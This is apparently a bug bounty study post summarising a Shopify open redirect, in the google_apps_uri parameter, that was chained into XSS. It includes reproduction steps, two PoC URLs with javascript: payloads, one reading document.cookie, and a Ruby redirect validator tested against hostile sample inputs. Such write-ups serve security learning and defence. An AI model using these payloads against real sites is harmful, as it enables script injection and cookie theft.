[Bugbounty Study] #Shopify _ Open Redirect to XSS
Study/Bugbounty Study, 2020. 3. 30. 18:15
#Shopify XSS _ $1750
https://medium.com/@ashketchum/how-i-earned-1750-at-shopify-bug-bounty-program-ca7821990d08
While looking around Shopify's your-store.myshopify.com, the researcher found the login service in the settings.
As shown above, with Enable Google Apps for login checked,
the researcher examined how permissions are granted when a staff member attempts to log in through Google.
The "google_apps_uri" parameter, visible when you use Log in with Google, is vulnerable to Open Redirect.
Because an Open Redirect on its own would not be accepted, a script was inserted into the parameter to turn it into an XSS vulnerability.
[Reproduction steps]
1. Go to https://yourshop.myshopify.com/admin/settings/account
2. Under the login service, set Staff can use Google Apps to log in -> Enable Google Apps for login
3. Open the PoC URL and attempt a Google login
[PoC]
https://app.shopify.com/services/login/identity?destination_uuid=79b5c315-b5ac-4b19-bd33-13554433fa31&google_apps_uri=javascript:prompt(document.domain)&return_to=https%253A%252F%252Fapp.shopify.com%252Fservices%252Flogin%252Fidentity_callback%253Fshop_name%253D123ashketchum%2526state%253D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%25253D&ui_locales=en&upgradeable=true&ux=shop
https://app.shopify.com/services/login/identity?destination_uuid=79b5c315-b5ac-4b19-bd33-13554433fa31&google_apps_uri=javascript:prompt(document.cookie)&return_to=https%253A%252F%252Fapp.shopify.com%252Fservices%252Flogin%252Fidentity_callback%253Fshop_name%253D123ashketchum%2526state%253D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%25253D&ui_locales=en&upgradeable=true&ux=shop
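The root cause is a redirect parameter (google_apps_uri) that was never restricted to http(s) targets, so a javascript: URL is followed. Below is an added example of the server-side check that closes both the open redirect and the XSS; it is not Shopify's code, it is written in Ruby only because the affected service is assumed to be a Rails app, and the host allowlist is an assumption about where a Google Apps login may legitimately redirect.

```ruby
# Added example (not Shopify's code): validation of a redirect-target
# parameter such as google_apps_uri before the server issues a redirect.
require 'uri'

# Hosts a Google Apps login redirect may point at (assumed allowlist).
ALLOWED_REDIRECT_HOSTS = %w[accounts.google.com www.google.com].freeze

# Returns the validated URL string, or nil when the target must be refused.
# A nil result should fall back to a fixed, safe login page, never to the
# raw parameter.
def safe_redirect_target(raw)
  return nil if raw.nil? || raw.empty?
  # Whitespace or control characters are only ever used to obfuscate the
  # scheme (e.g. "java\nscript:"), so refuse before parsing instead of
  # relying on how tolerant the parser is.
  return nil if raw.match?(/[\s\x00-\x1f\x7f]/)

  uri = begin
    URI.parse(raw)
  rescue URI::InvalidURIError
    return nil
  end

  # Scheme allowlist: https only. This is the check that rejects
  # "javascript:", "data:" and similar, regardless of letter case.
  return nil unless uri.scheme.to_s.downcase == 'https'
  # Host allowlist: an https redirect to an attacker host is still an open
  # redirect, so the destination host must be known as well.
  return nil unless ALLOWED_REDIRECT_HOSTS.include?(uri.host.to_s.downcase)
  # Embedded credentials ("trusted.host@evil.host") disguise the real host.
  return nil unless uri.userinfo.nil?

  uri.to_s
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: one legitimate target, the page's PoC payload,
  # and common variants a validator must also refuse.
  samples = [
    'https://accounts.google.com/o/oauth2/auth?client_id=example',
    'javascript:prompt(document.domain)',
    'JaVaScRiPt:prompt(document.cookie)',
    "java\nscript:prompt(1)",
    '//evil.example.com/login',
    'https://accounts.google.com@evil.example.com/'
  ]
  samples.each { |s| puts "#{safe_redirect_target(s) ? 'ALLOW ' : 'REJECT'} #{s.inspect}" }
end
```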
[Screenshot of the vulnerability]
google_apps_uri=javascript:prompt(document.domain)
[PoC Video]
[Lessons from this vulnerability]
Even if a report is rejected, don't give up; chain the finding into another vulnerability!
[Reference]